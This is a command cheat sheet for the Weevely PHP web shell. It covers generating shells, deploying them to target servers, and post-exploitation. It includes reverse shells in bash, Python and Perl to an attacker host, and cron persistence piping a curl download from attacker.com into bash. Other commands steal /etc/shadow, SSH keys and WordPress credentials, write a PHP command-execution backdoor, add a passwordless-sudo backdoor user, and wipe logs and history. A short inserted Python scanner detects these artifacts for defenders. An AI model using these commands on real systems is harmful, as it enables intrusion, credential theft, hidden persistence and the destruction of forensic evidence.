
Weevely

Stealth PHP web shell with encrypted communication for post-exploitation, including command execution, file management, privilege escalation, and lateral movement.

Weevely is a stealth PHP web shell that simulates a telnet-like connection for post-exploitation. It provides encrypted bidirectional communication, command execution, file management, and persistence capabilities.

Category: Web Shells & Post-Exploitation
Language: PHP
Communication: AES-256 encrypted HTTPS

# Clone from GitHub
git clone https://github.com/epinna/weevely3.git
cd weevely3

# Install dependencies
sudo apt update
sudo apt install python3 python3-pip git

pip3 install -r requirements.txt

# Make executable
chmod +x weevely.py

# Optional: Create symlink
sudo ln -s $(pwd)/weevely.py /usr/local/bin/weevely
# Homebrew installation
brew install weevely

# Manual installation
git clone https://github.com/epinna/weevely3.git
cd weevely3
pip3 install -r requirements.txt
sudo ln -s $(pwd)/weevely.py /usr/local/bin/weevely
# Direct from GitHub
git clone https://github.com/epinna/weevely3.git
cd weevely3
python3 -m weevely --help
Command                                  | Description
-----------------------------------------|---------------------------
weevely generate <password> <output.php> | Generate PHP web shell
weevely <URL> <password>                 | Connect to deployed shell
weevely --help                           | Display help information
weevely --version                        | Show version information
weevely <URL> <password> <command>       | Execute single command
# Basic shell generation
weevely generate password123 shell.php

# Generate with custom agent name
weevely generate mypassword agent.php

# Generate with obfuscated output
weevely generate securepass shell.php --obfuscate
# Generate shell with hardcoded password
weevely generate complex_pass backdoor.php

# Create minimal shell
weevely generate pass minimal.php --slim

# Generate for specific PHP version
weevely generate pass shell.php --php-version 7.4
# Via web form (file upload vulnerability)
# Upload shell.php through vulnerable upload form

# Via FTP
ftp targethost.com
put shell.php

# Via SCP
scp shell.php user@target:/var/www/html/

# Via WebDAV
curl -X PUT --data-binary @shell.php http://target.com/shell.php

# Via insecure deserialization or RCE
# Place shell.php in accessible location
# Deploy to WordPress uploads
# Transfer shell.php to /wp-content/uploads/

# Deploy to common locations
/var/www/html/
/var/www/
/home/*/public_html/
/usr/share/nginx/html/

# Verify deployment
curl http://target.com/shell.php
# Connect to deployed shell
weevely http://target.com/shell.php mypassword

# Connect with custom URL parameter
weevely "http://target.com/shell.php?id=1" password

# Connect through proxy
weevely http://target.com/shell.php pass --proxy http://proxy:8080
# Once connected, interactive shell starts
:> whoami
:> pwd
:> ls -la
:> help
# Execute command without interactive session
weevely http://target.com/shell.php pass :system whoami

# Piped execution
weevely http://target.com/shell.php pass :system "cat /etc/passwd | head"

# Command with output redirection
weevely http://target.com/shell.php pass :system "id > /tmp/id.txt"
# List directory contents
:> ls -la /home
:> find / -name "*.conf" 2>/dev/null

# Change directory
:> cd /var/www/html
:> pwd

# Display file contents
:> cat /etc/passwd
:> head -50 /var/www/html/config.php
# Upload local file
:> upload local_file.txt /tmp/

# Upload with permissions
:> upload exploit.sh /tmp/
:> chmod +x /tmp/exploit.sh

# Upload data exfiltration payload
:> upload data_stealer.py /var/www/
# Download from target
:> download /etc/passwd

# Download application config
:> download /var/www/html/wp-config.php

# Download multiple files
:> download /etc/shadow
:> download /root/.ssh/id_rsa
# Use file module for browsing
:> file ls /home

# List with details
:> file ls -la /var/www

# Search for files
:> file find /home -name "*.txt"

# File permissions
:> file chmod 755 /tmp/shell.sh

# Create directories
:> file mkdir /tmp/staging
# Basic command execution
:> id
:> whoami
:> hostname

# Enumerate system
:> uname -a
:> cat /etc/os-release
:> lsb_release -a

# Check current privileges
:> sudo -l
:> groups
:> id -G
# Network information
:> ifconfig
:> ip addr show
:> netstat -tuln
:> ss -tuln

# Process enumeration
:> ps aux
:> ps -ef

# Running services
:> systemctl list-units --type=service
:> service --status-all

# Installed software
:> dpkg -l
:> rpm -qa
# Spawn reverse shell
:> bash -i >& /dev/tcp/attacker_ip/port 0>&1

# Python reverse shell
:> python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("attacker",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'

# Perl reverse shell
:> perl -e 'use Socket;$i="attacker";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'
# List databases
:> sql query "SHOW DATABASES;"

# Select current database
:> sql query "USE wordpress;"

# Enumerate tables
:> sql query "SHOW TABLES;"

# Dump table structure
:> sql query "DESCRIBE wp_users;"

# Extract data
:> sql query "SELECT * FROM wp_users;"

# Extract credentials
:> sql query "SELECT user_login, user_pass FROM wp_users;"
# Check MySQL version
:> sql query "SELECT VERSION();"

# Current user
:> sql query "SELECT USER();"

# File privileges
:> sql query "SELECT load_file('/etc/passwd');"

# Write files
:> sql query "INTO OUTFILE '/var/www/html/shell.php' SELECT '<?php system($_GET[cmd]); ?>';"
# Scan internal network
:> nmap -sV 192.168.1.0/24

# Port scanning
:> netstat -tuln | grep LISTEN
:> ss -tuln

# DNS resolution
:> nslookup internal-server
:> host internal.local
# Upload lateral movement tools
:> upload mimikatz.exe /tmp/
:> upload plink.exe /tmp/

# Proxy through shell for pivoting
weevely http://target.com/shell.php pass --proxy

# Create tunnel
:> ssh -D 1080 pivot@internal-host
# Check sudo access
:> sudo -l

# Find SUID binaries
:> find / -perm -4000 2>/dev/null

# Check capabilities
:> getcap -r / 2>/dev/null

# Kernel version
:> uname -r

# Writable locations
:> find / -writable 2>/dev/null | grep -v proc
# Using system module
:> system sudoers

# Check cron jobs
:> cat /etc/crontab
:> ls -la /etc/cron.d/

# Upload exploit
:> upload linux-exploit.c /tmp/
:> gcc /tmp/linux-exploit.c -o /tmp/exploit
:> /tmp/exploit
# Add new user (requires root)
:> useradd -m -s /bin/bash backdoor
:> echo "backdoor:password123" | chpasswd

# Add to sudo
:> echo "backdoor ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers
# Add cron job
:> echo "* * * * * /bin/bash -i >& /dev/tcp/attacker/4444 0>&1" | crontab -

# Write to system cron
:> echo "* * * * * root curl http://attacker.com/update.sh | bash" > /etc/cron.d/update
# Multiple shells in different locations
:> cp /var/www/html/shell.php /tmp/shell.php
:> cp /var/www/html/shell.php /home/user/shell.php
:> cp /var/www/html/shell.php /var/tmp/shell.php
# Add authorized key
:> mkdir -p ~/.ssh
:> echo "ssh-rsa AAAA...key..." >> ~/.ssh/authorized_keys
:> chmod 700 ~/.ssh
:> chmod 600 ~/.ssh/authorized_keys
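The sections above describe what a compromised host ends up carrying: a PHP file that hands request parameters to an exec function (the `system($_GET[cmd])` one-liner), PHP dropped into an upload directory, cron entries that open `/dev/tcp` or pipe a download into a shell, and a `NOPASSWD:ALL` sudoers line. The following defender-side scanner is an added example, not part of Weevely or of this page; it works on a constructed in-memory `{path: content}` map so it runs offline, and the rule set and sample files are assumptions for illustration.

```python
"""Scan file contents for the web-shell and persistence artifacts described above.
Rules are content-based where possible and location-based where obfuscation
defeats content matching (PHP under an upload directory)."""
import re
from typing import Dict, List, Tuple

# PHP execution sink combined with request-controlled input, e.g. system($_GET[cmd]).
PHP_EXEC = re.compile(r"\b(system|exec|shell_exec|passthru|popen|eval|assert)\s*\(", re.I)
PHP_INPUT = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\s*\[", re.I)
# Cron command that opens /dev/tcp or pipes a downloaded script into a shell.
CRON_REMOTE_SHELL = re.compile(r"/dev/tcp/|(curl|wget)\s+\S+\s*\|\s*(ba|z|da)?sh\b")
# "<user> ALL=(ALL) NOPASSWD:ALL" (or ALL:ALL) grants unrestricted passwordless sudo.
SUDOERS_NOPASSWD = re.compile(r"^\s*(\S+)\s+ALL=\(ALL(?::ALL)?\)\s+NOPASSWD:\s*ALL\b", re.M)


def scan_files(files: Dict[str, str]) -> List[Tuple[str, str]]:
    """Return (path, indicator) pairs for every file that matches a rule."""
    findings: List[Tuple[str, str]] = []
    for path, content in files.items():
        if path.endswith(".php"):
            if PHP_EXEC.search(content) and PHP_INPUT.search(content):
                findings.append((path, "php-exec-of-request-input"))
            # Obfuscated agents defeat content rules, so also flag PHP by location:
            # a web server should never execute code from an upload directory.
            if "/uploads/" in path:
                findings.append((path, "php-in-upload-directory"))
        if "/cron" in path and CRON_REMOTE_SHELL.search(content):
            findings.append((path, "cron-remote-shell"))
        if path.endswith("sudoers") or "/sudoers.d/" in path:
            for match in SUDOERS_NOPASSWD.finditer(content):
                findings.append((path, f"sudoers-nopasswd-all:{match.group(1)}"))
    return findings


# Constructed sample files (not real system data); the hostname uses the reserved .invalid TLD.
SAMPLE_FILES: Dict[str, str] = {
    "/var/www/html/index.php": "<?php echo htmlspecialchars($_GET['q']); ?>",
    "/var/www/html/shell.php": "<?php system($_GET[cmd]); ?>",
    "/var/www/html/wp-content/uploads/2024/img.php": "<?php $x=base64_decode('Zm9v'); ?>",
    "/etc/crontab": "17 * * * * root cd / && run-parts --report /etc/cron.hourly\n",
    "/etc/cron.d/update": "* * * * * root curl http://example.invalid/update.sh | bash\n",
    "/etc/sudoers": "root ALL=(ALL:ALL) ALL\nbackdoor ALL=(ALL) NOPASSWD:ALL\n",
}

if __name__ == "__main__":
    for path, indicator in scan_files(SAMPLE_FILES):
        print(f"{indicator:32} {path}")
```

On a real host, feed it `{path: open(path).read()}` over the web root, `/etc/cron*`, `/var/spool/cron` and `/etc/sudoers*`, and treat each hit as a lead for review rather than proof of compromise.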
# Generate obfuscated shell
weevely generate password shell.php --obfuscate

# Custom user agent
:> system "curl -A 'Mozilla/5.0' http://internal.local/check"

# Encode commands
:> base64 sensitive_command
:> echo "Y2F0IC9ldGMvcGFzc3dk" | base64 -d | bash
# Disable bash history
:> export HISTFILE=/dev/null
:> unset HISTFILE

# Clear logs
:> cat /dev/null > /var/log/auth.log
:> echo "" > /var/log/apache2/access.log

# Remove traces
:> rm -f ~/.bash_history
:> history -c
# Use HTTPS for encryption
weevely https://target.com/shell.php password

# Randomize requests
:> system "sleep $((RANDOM % 300)) && curl http://target.com/check"

# Fragment payload
# Break large commands into smaller chunks
# System audit
:> audit modules

# Check configurations
:> audit disk
:> audit net
# Create backdoors
:> backdoor

# Web backdoor
:> backdoor shell
# Brute force credentials
:> bruteforce ftp
:> bruteforce ssh

# Dictionary attack
:> bruteforce http --wordlist=/path/to/dict
# Advanced file operations
:> file ls
:> file upload
:> file download
:> file cat
:> file chmod
# Network tools
:> net scan
:> net proxy
:> net dump
# Database interaction
:> sql query "SELECT VERSION();"
:> sql dump
:> sql connect
# System operations
:> system info
:> system priv
:> system whoami
:> help
# General help
:> help <module>

# Specific command help
:> <module> --help
# File operations
:> file ls /home
:> file upload payload.sh /tmp/
:> file download /etc/passwd

# Network scanning
:> net scan 192.168.1.0/24

# SQL queries
:> sql query "SELECT * FROM users;"

# System information
:> system uname
  • Use strong, unique passwords for each shell
  • Rotate shells regularly
  • Clean up uploaded files and logs
  • Use HTTPS over HTTP when possible
  • Minimize command output and logging
# Blend with legitimate traffic
  • User-Agent rotation
  • Timing variations between requests
  • Legitimate-looking HTTP headers

# File integrity
  • Keep shell permissions consistent
  • Use timestamps matching other files
  • Avoid suspicious file names
# Remove shells
:> find / -name "shell.php" -delete

# Clear logs
:> echo "" > /var/log/apache2/access.log
:> truncate -s 0 /var/log/auth.log

# Remove artifacts
:> history -c
:> rm -rf /tmp/uploaded_files
# Verify shell is accessible
curl http://target.com/shell.php

# Check firewall
:> telnet target.com 80

# Proxy issues
weevely http://target.com/shell.php pass --proxy http://proxy:8080
# Check file permissions
:> ls -la /var/www/html/shell.php

# Fix permissions
:> chmod 755 /var/www/html/shell.php

# Check PHP execution
:> apache2ctl status
# Verify module availability
:> help

# Check dependencies
:> system "which nmap"
:> system "which curl"

# Update Weevely
git pull
pip3 install -r requirements.txt
# 1. Generate shell
weevely generate Complex@Pass2024 shell.php

# 2. Upload through vulnerability
# Use identified file upload, RCE, or misconfig

# 3. Connect and verify
weevely http://target.com/uploads/shell.php Complex@Pass2024

# 4. Enumerate system
:> whoami
:> id
:> uname -a
# 1. Information gathering
:> cat /etc/passwd
:> sudo -l
:> find / -perm -4000 2>/dev/null

# 2. Privilege escalation
:> system "exploit-suggester.sh"
:> gcc /tmp/exploit.c -o /tmp/exploit
:> /tmp/exploit

# 3. Persistence
:> echo "backdoor ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers
:> crontab -e  # Add reverse shell

# 4. Data exfiltration
:> upload sensitive_data.tar.gz
:> download /home/user/documents/
# 1. Enumerate network
:> ifconfig
:> arp -a

# 2. Scan internal network
:> nmap -sV 192.168.1.0/24

# 3. Deploy to discovered hosts
:> scp shell.php user@internal-host:/tmp/

# 4. Create tunnel for pivoting
weevely http://internal-host/tmp/shell.php password
  • OWASP Web Shell Guidelines
  • NIST Incident Response Procedures
  • CWE-94: Improper Control of Generation of Code
  • ATT&CK Framework - Web Shell (T1505.003)
  • CVE Database for PHP vulnerabilities